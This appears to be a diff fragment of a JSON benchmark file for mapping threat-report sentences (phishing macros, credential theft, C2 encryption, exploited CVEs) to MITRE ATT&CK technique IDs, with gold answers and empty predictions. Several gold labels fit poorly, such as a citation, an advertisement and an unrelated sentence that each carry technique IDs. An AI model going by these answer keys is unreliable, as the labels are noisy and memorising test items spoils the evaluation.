+ "input": "This shortcut file points to the path of the previously written \u2018winhelp.cpl\u2019 file",
+ "gold": [
+ "T1547.009"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "It then sends the following IRC commands: NICK bxphzrjbxp USER bxphzrjbxp bxphzrjbxp bxphzrjbxp bxphzrjbxp To make sure it connected to the correct server, the Trojan checks for the message sent from the IRC server after the bot connects: Welcome to the MpkNet IRC Network The MPK bot does not join a specific IRC channel, instead sending private messages (PRIVMSG) to a user with the nick \u201cmpk\u201d",
+ "gold": [
+ "T1132"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This encoded information then gets an additional header added and sent across the network.",
+ "gold": [
+ "T1132"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Attack Overview The attack starts with Microsoft Word documents containing a malicious VBA macro being attached to spear phishing emails",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Attached to this email was a malicious Microsoft Word document (MD5: f6fafb7c30b1114befc93f39d0698560) that exploited CVE-2012-0158",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Like past attacks, the initial infection vector is a malicious Word document attached to a phishing email that is well-tailored to the targeted business and its day-to-day operations",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "MAGIC HOUND TOOLSET The Magic Hound attacks did not rely on exploit code to compromise targeted systems, instead relying on executables and Microsoft Office documents, specifically Excel and Word documents containing malicious macros",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The emails had a malicious Excel macro document attached, which when executed led to a new Microsoft Visual Basic (VB) script-based malware family which we are dubbing \u201cBabyShark\u201d",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The initial infection vector of this campaign is a Microsoft Office Excel Worksheet with an Office macro that uses the mshta.exe Windows executable to run scripts, which are embedded in the HTML of a specially-crafted blogspot.com page",
+ "gold": [
+ "T1598.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The majority of delivery documents contain a generic lure image requesting the victim enable macros with no additional content, the adversaries seemingly relying solely on lure filenames to entice victims to launch the malicious document",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "These documents contained malicious OLE objects used to drop binaries.This time, however, they contained malicious OLE (Object Link Embedded) objects.Initial analysis confirmed two similarly sized OLE object files within this document which appeared to be the same from an execution point of view.The two dropped binaries were stored and executed in this location during our analysis:C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (2).exeC:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\Hwp (3).exeInitial analysis showed some sloppy cleaning up from Group123, which we used later to determine that separate campaigns were the work of this same actor, as compilation artifacts remained within the binaries:e:\\Happy\\Work\\Source\\version 12\\T+M\\Result\\DocPrint.pdbThe second stage of the dropped binaries was used to execute wscript.exe while injecting shellcode into this process",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Cluster A Case 1: Delivery via document property macro \u2013 a789a282e0d65a050cccae66c56632245af1c8a589ace2ca5ca79572289fd483 \u00a0In our research we found at least one attack against a company leveraging a Microsoft Office Excel document with an embedded macro to launch the malware",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Whitefly first infects its victims using a dropper in the form of a malicious .exe or .dll file that is disguised as a document or image.",
+ "gold": [
+ "T1204"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The file, named Microsoft.Win32.TaskScheduler.dll, is digitally signed by a certificate from AirVPN",
+ "gold": [
+ "T1553.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The DLL is also digitally signed by a certificate from \u201cAirVPN\u201d",
+ "gold": [
+ "T1553.002"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "If the field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The AES key is unique for each communication and is encrypted with one of two RSA public keys",
+ "gold": [
+ "T1573"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "One of the malware families tied to this group, BADNEWS, continues to be updated both in how it uses dead drop resolvers, as well as how it communicates with a remote C2 server",
+ "gold": [
+ "T1102"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The tool would connect to the SQL SharePoint database and issue a query to dump all data from the database to a temporary file affixed with 'spdata'",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The information contained in this data dump include: Stolen credentials Potential systems to login to using stolen credentials Deployed webshell URLs Backdoor tools Command and control server component of backdoor tools Scripts to perform DNS hijacking Documents identifying specific individual operators Screenshots of OilRig operational systems The Leak In mid-March 2019, an unknown entity appeared on several hacking forums and Twitter with the user handle @Mr_L4nnist3r claiming they had access to data dumps involving internal tools and data used by the OilRig group",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The credentials appear to have been stolen via multiple techniques, including using post-exploition password recovery tools such as MimiKatz or its variant ZhuMimiKatz",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "In addition to these tools, we believe OilRig attackers obtained credentials through, bruteforcing, SQL injections, and using traditional credential harvesting toolkits as we discussed in the Striking Oil blog published in September 2017",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "We are unable to confirm if all of these stolen credentials are indeed valid sets of credentials, but based upon previously observed activity, timestamping, and known behaviors, it is highly probable that these credentials were or may still be valid",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Vault was implemented in Windows 7, it contains any sensitive data (like the credentials) of Internet Explorer",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Also, the use of the mimikatz and pwdump tools suggests the adversary attempts to dump credentials on compromised systems",
+ "gold": [
+ "T1003"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "DRIVE Lists the logical drives and the type, as well the total/free space of the fixed devices",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Command Description !Dir Lists the contents of a specified directory !Drives Enumerates the storage drives attached to the system and their respective type",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The dropped files are either in the root of the \u201cProgramData\u201d folder or in a subdirectory",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 7: Property list file in LaunchAgents directory To camouflage the location of the malicious file, Keydnap replaces argv[0] with /usr/libexec/icloudsyncd\u00a0\u2013launchd\u00a0netlogon.bundle",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": ".iqy files are simple text files containing a URL which are opened by default by Excel",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "These platforms may not be well maintained and may break intermittently",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Open directory listing of hxxp://stevemike-fireforce[.]info/ Based on the contents and structure of the initial identified open directories, it was possible to find several infrastructure patterns in use",
+ "gold": [
+ "T1083"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Figure 2: Zyklon attack flow Infection Techniques CVE-2017-8759 This vulnerability was discovered by FireEye in September 2017, and it is a vulnerability we have observed being exploited in the wild",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Second, the threat actors exploit CVE-2017-8570 to achieve code execution via a malicious \u201cscriptlet\u201d file, or .sct file, which is also embedded in the malicious RTF document",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Attack chain of Tropic Trooper\u2019s operations Here\u2019s a summary of the attack chain of Tropic Trooper\u2019s recent campaigns: Execute a command through exploits for CVE-2017-11882 or CVE-2018-0802, security flaws in Microsoft Office\u2019s Equation Editor (EQNEDT32.EXE)",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The attack involved the new HAWKBALL backdoor being delivered via well-known Microsoft Office vulnerabilities CVE-2017-11882 and CVE-2018-0802.",
+ "gold": [
+ "T1203"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "The attacker leveraged multiple exploits, targeting both\u00a0CVE-2014-6332\u00a0and\u00a0CVE-2014-4113",
+ "gold": [
+ "T1068"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Organizations that Buckeye targeted over time, per region Malware and tools Buckeye uses a number of hacking tools as well as malware",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "This group was observed using tactics such as registering typosquatting domains for security or technology vendors, abusing open-source penetration testing tools, and leveraging novel file types as anti-analysis techniques",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Keep security software up-to-date with the latest definitions Protection Norton Security, Symantec Endpoint Protection, and other Symantec security products protect users against these threats through the following detections: AV Backdoor.Cadelspy Backdoor.Remexi Backdoor.Remexi.B IPS System Infected: Backdoor.Cadelspy Activity 2 System Infected: Backdoor.Remexi Activity Indicators of compromise We have also compiled an indicators-of-compromise document containing further details which can be used to help identify the threats if they are present in your environment",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "Enterprises can benefit from Trend Micro\u2019s\u00a0Smart Protection Suites\u00a0with XGen security, which infuses high-fidelity machine learning into a blend of threat protection techniques to eliminate security gaps across any user activity and any endpoint",
+ "gold": [
+ "T1518.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "[9] \u201cHKU concern group raises proxy fears in key vote.\u201d EIJ Insight",
+ "gold": [
+ "T1090"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "In addition to using RDP for lateral movement, APT39 has used this protocol to maintain persistence in a victim environment",
+ "gold": [
+ "T1021.001"
+ ],
+ "predicted": ""
+ },
+ {
+ "instruction": "You are a cybersecurity expert specializing in the MITRE ATT&CK framework. Your task is to analyze cyber threat descriptions and identify the associated MITRE ATT&CK techniques. The MITRE ATT&CK framework is a globally-accessible knowledge base of adversary tactics and techniques based on real-world observations. This framework is used for developing specific threat models and methodologies in the private sector, government, and cybersecurity product and service community. Analyze this cyber threat description and list the relevant MITRE ATT&CK techniques. Output the MITRE ATT&CK techniques as a list of technique IDs with their names.\n",
+ "input": "APT40 has been observed consolidating files acquired from victim networks and using the archival tool rar.exe to compress and encrypt the data before exfiltration",
+ "gold": [
+ "T1560"
+ ],
+ "predicted": ""
+ },
+ {
